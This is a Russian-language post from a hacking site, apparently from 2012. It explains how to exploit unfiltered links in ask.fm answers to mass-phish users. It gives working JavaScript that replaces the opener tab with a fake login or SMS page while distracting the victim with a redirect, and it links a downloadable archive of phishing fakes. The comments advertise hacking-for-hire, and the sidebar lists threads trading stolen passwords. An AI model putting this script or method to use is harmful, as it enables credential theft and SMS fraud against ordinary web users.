Нажмите CTRL-D чтобы добавить нас в закладки
Внимание! Вы находитесь в незащищенном режиме (HTTP). Для перехода в защищенный режим SSL, нажмите здесь
HackZone.RU - Развод в ask.fm Актуальные базы 2GIS в форматах CSV,Excel,SQL
Войти / Регистрация / Участники
Определение даты выпуска iPhone по серийному номеру
-
Поиск по сайту
Форумы



Реклама

Поиск ТОП Добавить публикацию

Развод в ask.fm

26.11.2012

Вчера прогуливался по просторам ask.fm и увидел то, что там идёт переход по ссылкам без всяких переадресаторов (типа контактовского away.php), с помощью js (объекта window). И тут я вспомнил, как буквально год назад, заполучив доступ к сайту, работал с окнами на js, конкретнее с родительскими окнами (parent.window). И решил попробовать протестить данный баг. Заведя левую учётку, зареганную на 10 минутное мыло (http://10minutemail.com), я сам себе задал пару вопросов и сам себе ответил :) Но всё же увидел интересую фишку, что на вопрос фильтр ссылок действует, а на ответ - нет. Точнее говоря, задавая вопрос с левой ссылкой он мне тупо не доходит, а если отвечу я, вставив в ответ левую ссылку, - её увидят все посетители.
Буду краток, и напишу, что можно массово разводить людей на пассы и смс (ну это далеко не всех конечно).
Достаточно закинуть на левый хостинг (или абузоустойчивый) сам файл (я назвал его триггер), который будет отправлять нас на нужную страницу, а страницу с ask.fm подменять на левую.
Его код:

<html>
<head>
<title></title>
</head>
<body>
<script language="JavaScript">
   if(parent.window.opener) parent.window.opener.location.replace(
"http://ask.h19.ru/ask" ); //Здесь адрес, куда направить пользователя (фейк).
   document.location.href =
"http://hackzone.ru/"; //адрес, куда направить юзера для отвода глаз
</script>
</body>
</html>


ВАЖНО!!! В скрипте используется replace() для того, чтобы юзер в случае испуга, нажимая кнопку назад в браузере, не перешёл обратно на ask.fm. Таким образом история посещений якобы очищается.

Данный файл устроен таким образом, что если мы перейдём по ссылке с сайта (ask.fm), то он подменит текущую страницу на фейковую и перейдёт на сайт http://hackzone.ru/, а если юзер скопирует адрес и вставит его в адресную строку, то скрипт просто перейдёт на сайт http://hackzone.ru/.

Зальём файл с текущим содержимым на хостинг (к примеру holm.ru и будет ask.h19.ru). Адрес страницы: http://ask.h19.ru/  (она будет index.html)
И ответим на вопрос
А вот мой аккаунт: http://ask.h19.ru/ask

Пользователи переходят по ссылке и заходят на сайт hackzone.ru, а фейковая страница http://hackzone.ru.h18.ru/ask.php подменяет оригинальную ask.fm в браузере. А на данной странице уже будет находится фейк (я сделал 2 фейка по такому случаю: один с отправкой смс, другой)

СМС фейк          Фейк для кражи паролей

Ссылка на пример:

http://ask.fm/ForHackzone

Ссылка на фейк:

http://ask.h19.ru/fake.zip
Пароль: hackzone

Специально для HackZone от Leo08!

При копировании материалов ссылка на HackZone.RU обязательна

Добавить страницу в закладки

 Детали
Категория: Взлом
Опубликовал: Leo08
Просмотров: 58421
Проголосовало через SMS: 0
  Разместить у себя на сайте
Прямая ссылка
HTML
BBCode ссылка
BBCode ссылка с текстом

 Комментарии (оставить свой комментарий можно здесь)
Фейковый хост закончился. Вот архив с фейками.
вот тут
18.01.2013 / Leo08
как открыть text.txt?????
27.06.2013 / mazhorrawa
добрый день, предоставляю услуги взлома на заказ mail, вк и одноклассники, кто заинтересован пишите https://vk.com/id327913505 .
11.04.2016 / fgydc2ww
Только зарегистрированные пользователи могут оставлять комментарии

Зарегистрироваться *** Авторизоваться


 Последние новости и статьи  Последние сообщения с форумов
  • Самозащита от вируса Petya
  • Google Pixel взломали за 60 секунд
  • В CMS Joomla обнаружена критическая 0-day уязвимость
  • ФБР не смогло взломать протокол шифрования переписки террористов ...
  • Полиция обыскала дом предполагаемого создателя платежной системы ...
  • Google: квантовый ПК будет в 100 млн раз быстрее стандартных чипо...
  • "Лаборатория Касперского" констатирует усиление атак кибергруппир...
  • Microsoft Edge откроет исходные коды ChakraCore
  • Anonymous объявили 11 декабря «днём троллинга» ИГИЛ
  • Миллионы телевизоров, смартфонов и маршрутизаторов оказались уязв...

    Все новости... Все статьи... Прислать новость RSS
  • Разное / Предложения работы » Куплю пароли обнальщиков
  • Взлом и безопасность / Новичкам » Re: Взлом Whatsapp.Viber.Instagram. facebook.Узнаем взломаем...
  • Разное / Предложения работы » Re: Услуги хакера и взлом на заказ Заказать взлом? - пишите ...
  • Взлом и безопасность / Новичкам » Взламать фейсбук
  • Разное / Предложения работы » Re: Нужен взлом Вайбер
  • Разное / Предложения работы » Есть ли настоящая возможность украсть переписку Viber?
  • Разное / Предложения работы » скачать дистрибутив с фтп
  • Взлом и безопасность / Новичкам » Re: Профессиональные услуги по взлому
  • Взлом и безопасность / Программы » Re: Взлом программы
  • Разное / Предложения работы » Re: Нужен взлом вконтакте

    Все форумы... RSS


  • Разместить рекламу
    © HackZone Ltd. 2007-2012. Все права зарегистрированы.
    Перепечатка материалов без согласования и указания источника будет преследоваться по Закону

    О проекте | История проекта | Размещение рекламы | Обратная связь | Правила поведения на портале
    Ya-Cyt службы мониторинга серверов

    #{title}

    #{text}

    x

    #{title}

    #{text}